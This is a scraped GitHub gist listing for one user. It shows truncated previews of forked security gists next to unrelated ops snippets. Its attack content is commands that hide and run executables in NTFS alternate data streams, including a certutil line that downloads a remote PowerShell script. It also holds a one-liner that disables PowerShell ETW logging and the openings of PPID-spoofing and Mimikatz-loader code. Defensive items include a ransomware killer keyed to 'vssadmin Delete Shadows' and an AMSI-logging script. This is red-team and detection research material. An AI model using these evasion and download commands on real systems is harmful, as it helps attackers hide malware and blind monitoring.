git clone [email protected]:YOUR-USERNAME/YOUR-FORKED-REPO.git
cd into/cloned/fork-repo
git remote add upstream git://github.com/ORIGINAL-DEV-USERNAME/REPO-YOU-FORKED-FROM.git
git fetch upstream
duzvik
duzvik
/ Exe_ADS_Methods.txt
Created
January 21, 2020 08:03
— forked from api0cradle/Exe_ADS_Methods.md
Execute from Alternate Streams
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| ###Add content to ADS### | |
| type C:\temp\evil.exe > "C:\Program Files (x86)\TeamViewer\TeamViewer12_Logfile.log:evil.exe" | |
| extrac32 C:\ADS\procexp.cab c:\ADS\file.txt:procexp.exe | |
| findstr /V /L W3AllLov3DonaldTrump c:\ADS\procexp.exe > c:\ADS\file.txt:procexp.exe | |
| certutil.exe -urlcache -split -f https://raw.githubusercontent.com/Moriarty2016/git/master/test.ps1 c:\temp:ttt | |
| makecab c:\ADS\autoruns.exe c:\ADS\cabtest.txt:autoruns.cab | |
| print /D:c:\ads\file.txt:autoruns.exe c:\ads\Autoruns.exe | |
| reg export HKLM\SOFTWARE\Microsoft\Evilreg c:\ads\file.txt:evilreg.reg | |
| regedit /E c:\ads\file.txt:regfile.reg HKEY_CURRENT_USER\MyCustomRegKey | |
| expand \\webdav\folder\file.bat c:\ADS\file.txt:file.bat |
duzvik
/ PPID Spoof & BlockDLLs
Created
January 12, 2020 19:59
— forked from rasta-mouse/PPID Spoof & BlockDLLs
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| using System; | |
| using System.Diagnostics; | |
| using System.Runtime.InteropServices; | |
| namespace BlockDllTest | |
| { | |
| class Program | |
| { | |
| static void Main(string[] args) | |
| { |
duzvik
/ Kill-Ransomware.ps1
Created
November 5, 2019 16:01
— forked from thomaspatzke/Kill-Ransomware.ps1
Ransomware Killer
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| # Ransomware Killer v0.1 by Thomas Patzke <[email protected]> | |
| # Kill all parent processes of the command that tries to run "vssadmin Delete Shadows" | |
| # IMPORTANT: This must run with Administrator privileges! | |
| Register-WmiEvent -Query "select * from __instancecreationevent within 0.1 where targetinstance isa 'win32_process' and targetinstance.CommandLine like '%vssadmin%Delete%Shadows%'" -Action { | |
| # Kill all parent processes from detected vssadmin process | |
| $p = $EventArgs.NewEvent.TargetInstance | |
| while ($p) { | |
| $ppid = $p.ParentProcessID | |
| $pp = Get-WmiObject -Class Win32_Process -Filter "ProcessID=$ppid" | |
| Write-Host $p.ProcessID |
duzvik
/ EnableAMSILogging.ps1
Created
November 4, 2019 08:17
— forked from mattifestation/EnableAMSILogging.ps1
Enables AMSI logging to the AMSI/Operational event log
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| # Run this elevated, reboot, boom. | |
| # Feel free to name this whatever you want | |
| $AutoLoggerName = 'MyAMSILogger' | |
| $AutoLoggerGuid = "{$((New-Guid).Guid)}" | |
| New-AutologgerConfig -Name $AutoLoggerName -Guid $AutoLoggerGuid -Start Enabled | |
| Add-EtwTraceProvider -AutologgerName $AutoLoggerName -Guid '{2A576B87-09A7-520E-C21A-4942F0271D67}' -Level 0xff -MatchAnyKeyword 0x80000000000001 -Property 0x41 |
duzvik
/ KillETW.ps1
Created
September 23, 2019 17:40
— forked from tandasat/KillETW.ps1
Disable ETW of the current PowerShell session
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| # | |
| # This PowerShell command sets 0 to System.Management.Automation.Tracing.PSEtwLogProvider etwProvider.m_enabled | |
| # which effectively disables Suspicious ScriptBlock Logging etc. Note that this command itself does not attempt | |
| # to bypass Suspicious ScriptBlock Logging for readability. | |
| # | |
| [Reflection.Assembly]::LoadWithPartialName('System.Core').GetType('System.Diagnostics.Eventing.EventProvider').GetField('m_enabled','NonPublic,Instance').SetValue([Ref].Assembly.GetType('System.Management.Automation.Tracing.PSEtwLogProvider').GetField('etwProvider','NonPublic,Static').GetValue($null),0) |
duzvik
/ Tasks.cs
Created
September 10, 2019 17:04
— forked from djhohnstein/Tasks.cs
BulletProof Mimikatz - Load and execute Mimikatz in stordiag.exe, Cause likely your .NET defenses are bullshit and people are being deceived...Assume Security Products will fail...
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| using System; | |
| using System.IO; | |
| using System.Text; | |
| using System.IO.Compression; | |
| using System.EnterpriseServices; | |
| using System.Collections.Generic; | |
| using System.Runtime.InteropServices; | |
| using System.Security.Cryptography; | |
| /* |
duzvik
/ guacamole-docker.sh
Created
September 4, 2019 06:18
commands from https://techible.net/apache-guacamole-and-nginx-as-reverse-proxy-with-docker/ to set-up guacamole docker with nginx proxy
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #!/bin/bash | |
| sudo apt-get update | |
| sudo snap install docker | |
| sudo docker pull guacamole/guacd | |
| sudo docker pull guacamole/guacamole | |
| sudo docker pull mysql/mysql-server | |
| sudo docker run --name=mysqld -d mysql/mysql-server:5.7 | |
| mysql_pass=$(sudo docker logs mysqld 2>&1 | grep GENERATED|awk '{split($0,a," "); print a[5]}') |
duzvik
/ evtx-import-to-elk.ps1
Created
June 21, 2019 12:51
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #Requirements: | |
| #1) choco install git.install | |
| $evtx_samples_path = "C:\EVTX-ATTACK-SAMPLES" | |
| $winlogbeat_url = "https://storage.googleapis.com/beats-ci-artifacts/snapshots/winlogbeat/winlogbeat-oss-8.0.0-SNAPSHOT-windows-x86_64.zip" | |
| $winlogbeat_path = "C:\winlogbeat-8.0.0-SNAPSHOT-windows-x86_64" | |
| #get evtx repo | |
| if (-not (Test-Path $evtx_samples_path)) { | |
| Git clone https://github.com/sbousseaden/EVTX-ATTACK-SAMPLES.git $evtx_samples_path |
duzvik
/ gist:ac1635b07dbafff0df46d67d980e7d28
Created
July 12, 2018 08:57
— forked from CristinaSolana/gist:1885435
Keeping a fork up to date
How to configure SSL for FileBeat and Logstash step by step with OpenSSL (Create CA, CSRs, Certificates, etc).
The Elasticsearch documentation "Securing Communication With Logstash by Using SSL" does not show how to create with openssl the necessary keys and certificates to have the mutual authentication between FileBeat (output) and Logstash (input). It is not a difficult task but it can be very tedious if you are not familiar with the use of openssl.
These are some errors that can be found in the FileBeat and Logstash logs when SSL is not properly configured.
# FileBeat.